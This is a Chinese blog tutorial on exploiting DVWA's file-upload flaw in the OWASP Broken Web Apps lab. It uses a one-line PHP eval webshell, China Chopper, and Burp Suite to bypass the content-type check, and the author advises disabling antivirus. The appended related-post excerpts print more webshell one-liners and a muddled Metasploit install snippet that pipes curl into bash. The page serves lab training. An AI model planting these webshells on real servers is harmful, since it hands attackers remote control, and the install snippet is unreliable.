上传渗透----中国菜刀和kali的使用(安全攻防)

最新推荐文章于 2025-03-16 20:41:43 发布
最新推荐文章于 2025-03-16 20:41:43 发布
阅读量5.3k 收藏 74
点赞数 16
分类专栏: 未知攻,焉知防 文章标签: 上传漏洞攻击 中国菜刀 kali 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38803985/article/details/105375025
版权
本文介绍如何在OWASP_Broken_Web_Apps_VM靶机上利用不同安全级别的文件上传漏洞,通过中国菜刀和kali工具,演示从低到高安全模式的攻击过程,包括获取Webshell、利用Burp Suite改变文件类型及高安全模式下的源码分析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文章仅供实验参考

1.实验环境

目标靶机:OWASP_Broken_Web_Apps_VM_1.2
下载地址
我们还需要中国菜刀kali这两个工具,把所有的杀毒软件关了,不然中国菜刀可能会被杀毒软件和谐。
实验原理

1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等
2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回
3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell
4、一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网
5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制
2.低安全模式

首先我们需要用虚拟机打开目标靶机,并查看ip地址
在这里插入图片描述

root@owaspbwa:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:b2:da:ea brd ff:ff:ff:ff:ff:ff
    inet 192.168.13.144/24 brd 192.168.13.255 scope global eth0
    inet6 fe80::20c:29ff:feb2:daea/64 scope link 
       valid_lft forever preferred_lft forever

找到ip后,我们打开网页访问192.168.13.144
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传我们已经写好的小马文件(木马)
文件里面其实只有一行内容,所以叫做小马
小马: 一句话木马也称为小马,即整个shell代码量只有一行,一般是系统执行函数
大马: 代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到

<?php @eval($_POST['yjssjm']);?>
格式不要动,只需要改''里面的东西就行了,yjssjm是你定义的密码,与下面使用的中国菜刀密码保持一致就行

然后我们去目标靶机上面查看并创建一个测试文件

root@owaspbwa:~# cd /owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
shell.php
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# echo 'aaaa' > a.txt   #创建一个测试文件
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
a.txt  shell.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
设置好后我们双击点开
在这里插入图片描述
我们将a.txt删除,然后去服务器上查看,发现服务器上的a.txt文件也被删除了,这就是利用了上传漏洞进行攻击。
在这里插入图片描述

3.中安全模式

我们将安全改为中等,这时候再上传我们发现我们上传失败
**加粗样式**
在这里插入图片描述
在这里插入图片描述
这个时候我们需要用到kali这个工具作为代理,将我们访问的消息拦截,然后进行类型的改变再转发过去就可以了。
打开kali,默认用户名是root,密码是toor
在这里插入图片描述
在这里插入图片描述
然后我们一直点右下角I Accept ---- next ------ Start Burp 进入就行了
在这里插入图片描述
在这里插入图片描述
然后我们需要去网页上设置,将所有的访问都转到192.168.13.145
在这里插入图片描述
在这里插入图片描述
然后我们再次上传,这个时候kali上面会显示我们上传的信息
在这里插入图片描述
在这里插入图片描述
再看DVWA我们发现成功了
在这里插入图片描述
接下来就跟上面一样了,我们可以在中国菜刀进入该服务器。
如果自己下载不好中国菜刀跟kali的小伙伴可以在评论区留下自己的邮箱,
在这里劝大家自己在自己电脑上试试就好了,要是造成了经济损失就不好了。

4.高安全模式

高安全模式我们去看源码,会发现只能上传图片,这个时候的安全性以及很高了。
高安全模式下的做法

构建完善的安全渗透测试环境:推荐工具、资源下载链接
weixin_43263566的博客
02-14 4203
安全渗透环境准备(工具下载)
无线WiFi安全渗透与攻防()之kismet的使用
zz12345600354的博客
05-06 1246
Kismet是802.11二层无线网络探测器,嗅探器入侵检测系统。它将与支持原始监视(rfmon)模式中的任何无线网卡的工作,并能嗅出的802.11a /b / g / n的流量。它可以使用其他程序来播放音频警报网络事件,读出网络摘要,或提供GPS坐标。这是包含芯,客户端服务器的主包。
自学渗透第四天--中国菜刀
weixin_43710367的博客
05-12 1585
自学渗透第四天–中国菜刀 一、如何使用 中国菜刀使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。 (1)首先将一句话木马上传至网站后台。 (2)运行该文件,确认文件上传成功。 (3)复制该链接到中国菜刀,并输入相应的密码。 (4)成功获取网站shell。 二、常用功能 1、上传本地文件到网站后台。 2、下载在线文件至网站后台。 将欲下载的文件链接添加至下载框即可 由于某
菜刀渗透
刘思成的博客
03-27 2619
快速搭建discuz论坛 使用kali下BurpSuite对discuz后台注入php木马 使用Cknife“菜刀”.上传webshell木马到网站 使用Webshell查看mysql数据库密码并盗取数据库 快速搭建discuz论坛 攻击思路 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本,找漏洞 2、拿到对A有一定权限的身份,如果对方是一个WEB服务器,就利用...
文件上传漏洞(详解)
最新发布
xiexierong的博客
03-16 909
将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。通常一个文件以HTTP协议进行上传时,将以POST请求发送至Web服务器,Web服务器收到请求并同意后,用户与Web服务器将建立连接,并传输数据。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接有效的,"文件上传"本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
qq_53058639的博客
03-17 2185
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站服务器的管理。?
中国菜刀使用与原理分析
weixin_45597678的博客
12-04 2万+
中国菜刀的功能 中国菜刀使用 原理分析
中国菜刀原理
weixin_34409822的博客
05-25 688
用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用PHP的一句话来做实验了,Aspjsp的原理应该都差不多。服务端的.php是这...
V2022全栈培训笔记(WEB攻防47-WEB攻防-通用漏洞&Java反序列化&EXP生成&数据提取&组件安全
zz12345600354的博客
06-12 1069
1、Java反序列化演示-原生API接☐2、Java反序列化漏洞利用-Ysoserial使用3、Java反序列化漏洞发现利用点-函数&数据4、Java反序列化考点-真实&CTF赛题-审计分析#内容点:1、明白Java反序列化原理2、判断Java反序列化漏洞3、学会-Ysoserial_工具使用4、学会-SerializationDumper5、了解-简要Java代码审计分析#前置知识序列化反序列化的概念:序列化:把Java对象转换为字节序列的过程。
Kali Linux 安全渗透核心总结
cc123489ll的博客
04-25 855
接下来我将给各位同学划分一张学习计划表!
网络攻防入门---文件上传漏洞及防御
濯君
12-27 914
一:下载相应的工具 VMware Kali linux2020.3下载与安装详细教程 OWASP Broken Web Apps渗透测试环境搭建安装教程 中国菜刀下载 二:主要是使用靶机OWASP Broken Web Apps中的Damn Vulnerable Web App作为攻击目标,其中的upload存在文件上传漏洞 其中的DVWA Security可以设置安全等级,共有三个安全等级low,medium,high 三:low安全等级 此安全等级下的upload源码 <?php
渗透测试中菜刀的应用(webshell)
2301_80460220的博客
10-27 617
顾名思义,“web”的含义是显然。
maicaidao
0ffs3t
10-27 1670
这篇文章是一个朋友写的,但是他不让说他是谁,就替他保密一下了。这篇文章看起来很像软文,但是文章中介绍的还挺详细,不要把他当成软文来读就行了。 作者:XXX 我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的技术经验也不断提高,在渗透过程中收集了大大小小的工具一堆,都快把自己的U盘放满了,当然,随着时代技术的进步,很多工具也相应的过时了,但是却很少去删掉
上传漏洞实验演示
weixin_44188298的博客
05-29 406
【实验思路】 1.找到上传点 2.上传图片或木马 3.删除验证方式绕过上传 4.修改过滤白名单绕过上传 【实验环境】 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.com 【实验目的】 掌握杰奇CMS上传漏洞的利用方法 了解如何对此漏洞进行修复 【实验工具】 中国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 Firebug:Firebug是firefox
渗透测试工具
qq_45233918的博客
07-19 715
渗透测试工具 一、十个渗透工具 nmap sqlmap Burpsuite hydra 中国菜刀 中国蚁剑 御剑 Nessus AWVS Appscan 二、介绍与使用 nmape主要用来 主机发现、 端口扫描、 版本侦测、 操作系统侦测 一些常用的参数 : -A :选项用于使用进攻性方式扫描 -T4: 指定扫描过程使用的时序,总有6个级别(0-5)级别越高,扫描速度越快,但也容易被 防火墙或I...
渗透工具环境篇——Cknife中国菜刀使用
热门推荐
Litbai_zhang
10-09 2万+
提要 在学习上传漏洞的时候研究到了Cknife这个软件。下面来介绍一下菜刀使用方法。 使用 1.下载菜刀,打开Cknife.jar软件 2.右键点击添加 3.输入上传的php文件,php文件密码,脚本类型选择PHP,字符编码GB2312,点击添加 4.右键文件管理 成功 ...
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
网络安全领域优质创作者
11-21 2228
本质 : 上传一句话木马 <?php echo shell_exec($_GET[‘cmd‘]);?> windows平台 中国菜刀 支持asp、php、asp.netjsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> p...
kali菜刀安装教程
08-28
Kali Linux是一个专门为安全评估、渗透测试网络安全教育设计的操作系统。要在Kali Linux上安装软件或工具,特别是像“菜刀(Metasploit Framework)这样的工具,通常通过包管理器进行。以下是安装Metasploit的基本步骤: 1. 打开终端:在Kali Linux桌面环境中,你可以通过快捷键`Ctrl + Alt + T`打开终端。 2. 更新系统:确保系统是最新的,输入并执行命令: ``` sudo apt-get update sudo apt-get upgrade ``` 3. 安装依赖:Metasploit需要一些依赖项,运行: ``` sudo apt-get install ruby-full libcap2-bin python-dev python-pip ``` 4. 安装Ruby:虽然Kali默认包含Ruby,但有时可能需要更新到最新版本,可以这样做: ``` gpg --keyserver pool.sks-keyservers.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 curl -L https://get.rvm.io | bash -s stable --ruby source ~/.rvm/scripts/rvm rvm use system ``` 5. 安装Metasploit:最后,你可以通过pip安装Metasploit框架: ``` gem install metasploit-framework ``` 6. 启动Metasploit:安装完成后,启动Metasploit框架: ``` msfconsole ``` 如果你遇到任何问题,可能是网络连接问题或权限不足,检查网络连通性,并确保有管理员权限进行上述操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值